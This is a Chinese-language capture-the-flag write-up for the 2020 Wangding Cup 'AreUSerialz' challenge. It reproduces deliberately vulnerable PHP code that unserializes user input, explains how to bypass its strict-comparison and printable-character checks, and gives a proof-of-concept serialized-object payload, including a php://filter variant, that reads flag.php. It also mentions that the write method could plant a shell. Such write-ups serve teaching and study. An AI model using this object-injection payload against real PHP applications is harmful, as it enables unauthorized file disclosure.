当前位置：首页 > news >正文

[网鼎杯 2020 青龙组]AreUSerialz

news 2025/9/2 9:54:35

[网鼎杯 2020 青龙组]AreUSerialz

<?phpinclude("flag.php");highlight_file(__FILE__);class FileHandler {protected $op;protected $filename;protected $content;function __construct() {$op = "1";$filename = "/tmp/tmpfile";$content = "Hello World!";$this->process();}//根据op值处理public function process() {if($this->op == "1") {$this->write();} else if($this->op == "2") {$res = $this->read();$this->output($res);} else {$this->output("Bad Hacker!");}}//进行文件写入private function write() {if(isset($this->filename) && isset($this->content)) {if(strlen((string)$this->content) > 100) {$this->output("Too long!");die();}$res = file_put_contents($this->filename, $this->content);if($res) $this->output("Successful!");else $this->output("Failed!");} else {$this->output("Failed!");}}//可以考虑read读取flag。好像上面的write也可以写shell。先尝试能不能直接读取private function read() {$res = "";if(isset($this->filename)) {$res = file_get_contents($this->filename);}return $res;}private function output($s) {echo "[Result]: <br>";echo $s;}//op强等于“2”设置op等于“1”function __destruct() {if($this->op === "2")$this->op = "1";$this->content = "";$this->process();}}//判断是否为可见字符
function is_valid($s) {for($i = 0; $i < strlen($s); $i++)if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))return false;return true;
}if(isset($_GET{'str'})) {$str = (string)$_GET['str'];if(is_valid($str)) {$obj = unserialize($str);}}

查看代码可以看出来，GET方式传入序列化的str字符串，str字符串中每一个字符的ASCII范围在32到125之间，然后对其反序列化。

在反序列化的过程中，调用__destruct析构方法

析构方法判断为强等于。可以考虑绕过

有一个需要注意的地方是，op, filename, content三个变量权限都是protected，而protected权限的变量在序列化的时会有%00*%00字符，%00字符的ASCII码为0，就无法通过上面的is_valid函数校验。

简单的一种绕过方法是：php7.1+版本对属性类型不敏感，本地序列化的时候将属性改为public进行绕过即可

POC:

<?php
class FileHandler {public $op = 2;public $filename = "flag.php";
//    或者 public $filename = "php://filter/read=convert.base64-encode/resource=flag.php";public $content;
}$a = new FileHandler();
$b = serialize($a);
echo($b);